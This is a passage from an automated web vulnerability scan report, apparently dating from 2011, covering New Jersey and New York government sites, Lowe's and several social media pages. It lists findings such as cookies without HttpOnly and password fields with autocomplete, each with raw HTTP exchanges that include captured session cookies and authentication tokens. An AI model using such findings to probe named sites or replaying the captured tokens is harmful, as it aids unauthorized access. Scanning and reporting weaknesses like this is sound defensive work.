NSC_ozmpuufsz.psh*80=ffffffffd236878345525d5f4f58455e445a4a423660;expires=Wed, 13-Jul-2011 01:52:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.nylottery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 13 Jul 2011 01:50:12 GMT
Server: IBM_HTTP_Server
Location: http://nylottery.org/wps/portal
Cache-Control: max-age=1
Expires: Wed, 13 Jul 2011 01:50:13 GMT
Content-Length: 215
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_ozmpuufsz.psh*80=ffffffffd236878345525d5f4f58455e445a4a423660;expires=Wed, 13-Jul-2011 01:52:12 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://nylottery.org/wps/portal">here</a>.</p>

...[SNIP]...

7.57. http://www.recovery.ny.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.recovery.ny.gov
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

webpool=webpool_web03; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.recovery.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:50:17 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1310521817"
X-Generator: Drupal 7 (http://drupal.org)
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web03; path=/
Content-Length: 15845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...

7.58. http://www.youtube.com/NewJerseyGovernment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/NewJerseyGovernment

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=wAQMWIHYLkY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewJerseyGovernment HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.59. http://www.youtube.com/newjerseylottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/newjerseylottery

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=TlJvxUF36FY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newjerseylottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8. Password field with autocomplete enabled previous next
There are 20 instances of this issue:

https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login
https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser
http://twitter.com/
http://twitter.com/
http://twitter.com/
http://twitter.com/login
http://twitter.com/login
http://visitnj.org/
http://www.facebook.com/NewJerseyLottery
https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
http://www.state.nj.us/lottery/games/1-0_numbers_draw_games.htm
http://www.state.nj.us/lottery/home.shtml
http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm
http://www.visitnj.org/events
http://www.visitnj.org/new-jerseys-wineries
https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

8.1. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The page contains a form with the following action URL:

https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/blank

The form contains the following password field with autocomplete enabled:

IDToken2

Request

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:04 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: Mozilla
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwBgv24XJbQ4NKEBvqh8qUMkdDvgelWROk%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9

<html>

<head>
<title>Log On To myNewJersey</title>

<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...
<tr>
   <form name="frm2" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/blank"
    onSubmit="defaultSubmit(); return false;" method="post">    
...[SNIP]...
<td class="loginText">
    <input type="password" name="IDToken2"
id="IDToken2"
       value="" size="20">
   </td>
...[SNIP]...

8.2. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

Issue detail

The page contains a form with the following action URL:

https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

The form contains the following password fields with autocomplete enabled:

userPassword
confirmPassword

Request

GET /http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8KCHkif57us6GAU2YZ9vUrrHig0JMuag%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:18 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 8957
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9

<html>
<head>
<title>Create Your myNewJersey Account</title>
<link rel="stylesheet" type="text/css" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/portal/desktop/css/styl
...[SNIP]...
</table>

<form name="signup" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser" method="POST">
<table border="0" width="100%" cellpadding="3" cellspacing="0">
...[SNIP]...
<td>
<input type="password" width="20" maxlength="20" name="userPassword">

</td>
...[SNIP]...
<td>
<input type="password" width="20" maxlength="20" name="confirmPassword">

</td>
...[SNIP]...

8.3. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The page contains a form with the following action URL:

https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/blank

The form contains the following password field with autocomplete enabled:

IDToken2

Request

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8cIdgoahtAXnAW%252F3%252FPfpm4q%252F9mG8Zu5U%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close

<html>

<head>
<title>Log On To myNewJersey</title>

<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...
<tr>
   <form name="frm2" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/blank"
    onSubmit="defaultSubmit(); return false;" method="post">    
...[SNIP]...
<td class="loginText">
    <input type="password" name="IDToken2"
id="IDToken2"
       value="" size="20">
   </td>
...[SNIP]...

8.4. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

Issue detail

The page contains a form with the following action URL:

https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

The form contains the following password fields with autocomplete enabled:

userPassword
confirmPassword

Request

GET /http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:53:02 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 8957
Connection: close

<html>
<head>
<title>Create Your myNewJersey Account</title>
<link rel="stylesheet" type="text/css" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/portal/desktop/css/styl
...[SNIP]...
</table>

<form name="signup" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser" method="POST">
<table border="0" width="100%" cellpadding="3" cellspacing="0">
...[SNIP]...
<td>
<input type="password" width="20" maxlength="20" name="userPassword">

</td>
...[SNIP]...
<td>
<input type="password" width="20" maxlength="20" name="confirmPassword">

</td>
...[SNIP]...

8.5. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/signup

The form contains the following password field with autocomplete enabled:

user[user_password]

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.6. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions?phx=1

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.7. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions?phx=1

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.8. http://twitter.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /login HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwixoD0hMQE6%250AB2lkIiU5OWExZDRmMWUzN2U3MzU3MTZiMTI2Zjc0NDNmODVhNzoMY3NyZl9p%250AZCIlY2FhNmZmMWMzY2YwMWUxNTYyYWQ4NzgyMGRmMGJlMTgiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--50bfdb52e14835d473c0b9478dd99f22193f449a; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.4.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

8.9. http://twitter.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

8.10. http://visitnj.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://visitnj.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://visitnj.org/

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.11. http://www.facebook.com/NewJerseyLottery previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/NewJerseyLottery

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.12. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The page contains a form with the following action URL:

https://www.lowes.com/webapp/wcs/stores/servlet/Logon

The form contains the following password field with autocomplete enabled:

logonPassword

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 02:33:05 GMT
Set-Cookie: TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; Path=/
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<br /> -->

<form method="post" name="Logon" action="Logon" id="Logon">
<input type="hidden" name="storeId" value="10151" id="WC_UserLogonForm_FormInput_storeId_In_Logon_1"/>
...[SNIP]...
<div class="form-input-block">
<input class="small" type="password" name="logonPassword" value="" id="logonPassword" onfocus="this.onkeypress = pressEnter;" />
</div>
...[SNIP]...

8.13. http://www.state.nj.us/lottery/games/1-0_numbers_draw_games.htm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-0_numbers_draw_games.htm

Issue detail

The page contains a form with the following action URL:

https://www6.state.nj.us/LOT_LVC/LogAndLoad

The form contains the following password field with autocomplete enabled:

password

Request

GET /lottery/games/1-0_numbers_draw_games.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.14. http://www.state.nj.us/lottery/home.shtml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/home.shtml

Issue detail

The page contains a form with the following action URL:

https://www6.state.nj.us/LOT_LVC/LogAndLoad

The form contains the following password field with autocomplete enabled:

password

Request

GET /lottery/home.shtml HTTP/1.1
Host: www.state.nj.us
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/lottery/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfczfjhoFFDpWNk0ih9CnFjKv6RlTaRw0JXs%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:44:23 GMT
Content-type: text/html
Connection: close
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="vip-content">
<form id="login-form"name="login" action="https://www6.state.nj.us/LOT_LVC/LogAndLoad" method="post">
<input name="email" type="text" class="login" maxlength="40" /><input name="password" type="password" class="login" maxlength="30" />
</form>
...[SNIP]...

8.15. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/vip/3-0_vip_gen_info.htm

Issue detail

The page contains a form with the following action URL:

https://www6.state.nj.us/LOT_LVC/LogAndLoad

The form contains the following password field with autocomplete enabled:

password

Request

GET /lottery/vip/3-0_vip_gen_info.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.16. http://www.visitnj.org/events previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.visitnj.org
Path:	/events

Issue detail

The page contains a form with the following action URL:

http://www.visitnj.org/events

The form contains the following password field with autocomplete enabled:

pass

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.17. http://www.visitnj.org/new-jerseys-wineries previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.visitnj.org
Path:	/new-jerseys-wineries

Issue detail

The page contains a form with the following action URL:

http://www.visitnj.org/new-jerseys-wineries

The form contains the following password field with autocomplete enabled:

pass

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.18. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www1.state.nj.us
Path:	/TYTR_Saver/jsp/common/Login.jsp

Issue detail

The page contains a form with the following action URL:

https://www1.state.nj.us/TYTR_Saver/servlet/common/Login

The form contains the following password field with autocomplete enabled:

Request

GET /TYTR_Saver/jsp/common/Login.jsp HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:45 GMT
Content-type: text/html
Set-cookie: JSESSIONID=212f7dfab86ed2f492b92e02d519;Path=/TYTR_Saver
Set-cookie: JROUTE=Wr84;Path=/TYTR_Saver
Connection: close

<HTML>
<head>

<TITLE>File Your Homestead Benefit Online</TITLE>
<!--<LINK REL="stylesheet" HREF
...[SNIP]...
</table>

<form method="POST" action="/TYTR_Saver/servlet/common/Login" NAME="Login">

<table width="90%" align="center">
...[SNIP]...
<td align="left" valign="top" width="28%">
<input class="inputTxt" name="pin" type="password" maxlength=4 size=4>
<font class="asterisk">
...[SNIP]...

8.19. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Issue detail

The page contains a form with the following action URL:

https://www6.state.nj.us/LOT_LVC/Write_Reg

The form contains the following password fields with autocomplete enabled:

password
password_confirm

Request

GET /LOT_LVC/jsp/lvc1_0_vip_reg.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=C2D1D22C30B568638365FC0BBB7F4E87;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...


   <form name="registration" onSubmit="return Validate();" method="post" action="/LOT_LVC/Write_Reg">

   <p class="style4 style1 stepHeader">
...[SNIP]...
<span class="fieldName">
    <input type="password" name="password" class="input_bg" size="30" maxlength="20" value= >
</span>
...[SNIP]...
<span class="fieldName">
    <input type="password" name="password_confirm" class="input_bg" size="30" maxlength="20" value= >

</span>
...[SNIP]...

8.20. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_S0_login.jsp

Issue detail

The page contains a form with the following action URL:

https://www6.state.nj.us/LOT_LVC/LogAndLoad

The form contains the following password field with autocomplete enabled:

password

Request

GET /LOT_LVC/jsp/lvc1_S0_login.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=16461B7951076D32FDBB1BA8E456A263;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="177" align="center" valign="top">
<form action="/LOT_LVC/LogAndLoad" method="post" name="login" id="login">
<div align="center">
...[SNIP]...
<br />
<input type="password" name="password" maxlength="30" size="20" />
</div>
...[SNIP]...

9. Source code disclosure previous next
There are 2 instances of this issue:

/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js
/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

9.1. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
